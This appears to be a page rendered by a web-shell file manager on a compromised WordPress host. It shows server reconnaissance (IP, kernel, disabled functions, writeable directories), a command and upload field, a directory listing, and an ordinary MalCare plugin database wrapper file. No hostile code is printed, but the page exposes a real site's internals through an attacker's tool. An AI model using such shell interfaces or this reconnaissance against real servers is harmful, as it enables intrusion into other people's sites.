GRAYBYTE WORDPRESS FILE MANAGER3841

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/nioscentre.in/wp-content/plugins/malcare-security/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/nioscentre.in/wp-content/plugins/malcare-security//wp_db.php
<?php
// phpcs:disable WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared
if (!defined('ABSPATH')) exit;
if (!class_exists('MCWPDb')) :

class MCWPDb {
	public function dbprefix() {
		global $wpdb;
		$prefix = $wpdb->base_prefix ? $wpdb->base_prefix : $wpdb->prefix;
		return $prefix;
	}

	public function prepare($query, $args) {
		global $wpdb;
		return $wpdb->prepare($query, $args);
	}

	public function getSiteId() {
		global $wpdb;
		return $wpdb->siteid;
	}

	public function getResult($query, $obj = ARRAY_A) {
		global $wpdb;
		return $wpdb->get_results($query, $obj);
	}

	public function query($query) {
		global $wpdb;
		return $wpdb->query($query);
	}

	public function getVar($query, $col = 0, $row = 0) {
		global $wpdb;
		return $wpdb->get_var($query, $col, $row);
	}

	public function getCol($query, $col = 0) {
		global $wpdb;
		return $wpdb->get_col($query, $col);
	}

	public function getLastRowId($col_name, $table_name) {
		$query = "SELECT MAX($col_name) AS last_id FROM $table_name";
		$results = $this->getResult($query);
		if (empty($results) || !is_array($results) || !is_array($results[0]) ||
				!array_key_exists("last_id", $results[0])) {
			return null;
		}
		$last_id = $results[0]['last_id'];
		if ($last_id === null) {
			return 0;
		} else if (is_numeric($last_id) === true) {
			return (int) $last_id;
		}
	}

	public function tableName($table) {
		return $table[0];
	}

	public function showTables() {
		$tables = $this->getResult("SHOW TABLES", ARRAY_N);
		return array_map(array($this, 'tableName'), $tables);
	}


	public function showTableStatus() {
		return $this->getResult("SHOW TABLE STATUS");
	}

	public function tableKeys($table) {
		return $this->getResult("SHOW KEYS FROM $table;");
	}

	public function showDbVariables($variable) {
		$variables = $this->getResult("Show variables like '%$variable%' ;");
		$result = array();
		foreach ($variables as $variable) {
			$result[$variable["Variable_name"]] = $variable["Value"];
		}
		return $result;
	}

	public function describeTable($table) {
		return $this->getResult("DESCRIBE $table;");
	}

	public function showTableIndex($table) {
		return $this->getResult("SHOW INDEX FROM $table");
	}

	public function checkTable($table, $type) {
		return $this->getResult("CHECK TABLE $table $type;");
	}

	public function repairTable($table) {
		return $this->getResult("REPAIR TABLE $table;");
	}

	public function showTableCreate($table) {
		return $this->getVar("SHOW CREATE TABLE $table;", 1);
	}

	public function rowsCount($table) {
		$count = $this->getVar("SELECT COUNT(*) FROM $table;");
		return intval($count);
	}

	public function createTable($query, $name, $usedbdelta = false) {
		$table = $this->getBVTable($name);
		if (!$this->isTablePresent($table)) {
			if ($usedbdelta) {
				if (!function_exists('dbDelta'))
					require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
				dbDelta($query);
			} else {
				$this->query($query);
			}
		}
		return $this->isTablePresent($table);
	}

	public function createTables($tables, $usedbdelta = false) {
		$result = array();
		foreach ($tables as $table => $query) {
			$result[$table] = $this->createTable($query, $table, $usedbdelta);
		}
		return $result;
	}

	public function alterBVTable($query, $name) {
		$resp = false;
		$table = $this->getBVTable($name);
		if ($this->isTablePresent($table)) {
			$resp = $this->query($query);
		}
		return $resp;
	}

	public function alterTables($tables) {
		$result = array();
		foreach ($tables as $table => $query) {
			$result[$table] = $this->alterBVTable($query, $table);
		}
		return $result;
	}

	public function getTableContent($table, $fields = '*', $filter = '', $limit = 0, $offset = 0) {
		$query = "SELECT $fields from $table $filter";
		if ($limit > 0)
			$query .= " LIMIT $limit";
		if ($offset > 0)
			$query .= " OFFSET $offset";
		$rows = $this->getResult($query);
		return $rows;
	}

	public function isTablePresent($table) {
		return ($this->getVar("SHOW TABLES LIKE '$table'") === $table);
	}

	public function getCharsetCollate() {
		global $wpdb;
		return $wpdb->get_charset_collate();
	}

	public function getWPTable($name) {
		return ($this->dbprefix() . $name);
	}

	public function getBVTable($name) {
		return ($this->getWPTable("bv_" . $name));
	}

	public function truncateBVTable($name) {
		$table = $this->getBVTable($name);
		if ($this->isTablePresent($table)) {
			return $this->query("TRUNCATE TABLE $table;");
		} else {
			return false;
		}
	}

	public function deleteBVTableContent($name, $filter = "") {
		$table = $this->getBVTable($name);
		if ($this->isTablePresent($table)) {
			return $this->query("DELETE FROM $table $filter;");
		} else {
			return false;
		}
	}

	public function dropBVTable($name) {
		$table = $this->getBVTable($name);
		if ($this->isTablePresent($table)) {
			$this->query("DROP TABLE IF EXISTS $table;");
		}
		return !$this->isTablePresent($table);
	}

	public function dropTables($tables) {
		$result = array();
		foreach ($tables as $table) {
			$result[$table] = $this->dropBVTable($table);
		}
		return $result;
	}

	public function truncateTables($tables) {
		$result = array();
		foreach ($tables as $table) {
			$result[$table] = $this->truncateBVTable($table);
		}
		return $result;
	}

	public function deleteRowsFromtable($name, $count = 1) {
		$table = $this->getBVTable($name);
		if ($this->isTablePresent($table)) {
			return $this->getResult("DELETE FROM $table LIMIT $count;");
		} else {
			return false;
		}
	}

	public function replaceIntoBVTable($name, $value) {
		global $wpdb;
		$table = $this->getBVTable($name);
		return $wpdb->replace($table, $value);
	}

	public function insertIntoBVTable($name, $value) {
		global $wpdb;
		$table = $this->getBVTable($name);
		return $wpdb->insert($table, $value);
	}

	public function tinfo($name) {
		$result = array();
		$table = $this->getBVTable($name);

		$result['name'] = $table;

		if ($this->isTablePresent($table)) {
			$result['exists'] = true;
			$result['createquery'] = $this->showTableCreate($table);
		}

		return $result;
	}

	public function getMysqlVersion() {
		return $this->showDbVariables('version')['version'];
	}
}
endif;

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 11 2025 13:53:58
giriqfky / giriqfky
0755
admin
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
callback
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
css
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
form_testing
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
img
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
php_error_monitoring
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
protect
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
public_keys
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
wp_2fa
--
May 27 2025 09:08:25
giriqfky / giriqfky
0755
account.php
7.141 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
helper.php
10.678 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
info.php
7.147 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
license.txt
19.463 KB
May 03 2018 15:54:28
giriqfky / giriqfky
0644
malcare.php
8.494 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
readme.txt
32.206 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
recover.php
1.707 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_actions.php
2.916 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_actlog.php
17.523 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_admin.php
12.053 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_api.php
1.04 KB
February 23 2022 14:05:26
giriqfky / giriqfky
0644
wp_cli.php
5.6 KB
May 23 2023 11:01:36
giriqfky / giriqfky
0644
wp_db.php
6.104 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_dynsync.php
34.751 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_file_system.php
2.289 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_login_whitelabel.php
1.476 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_settings.php
2.062 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644
wp_site_info.php
2.319 KB
May 26 2025 14:48:58
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF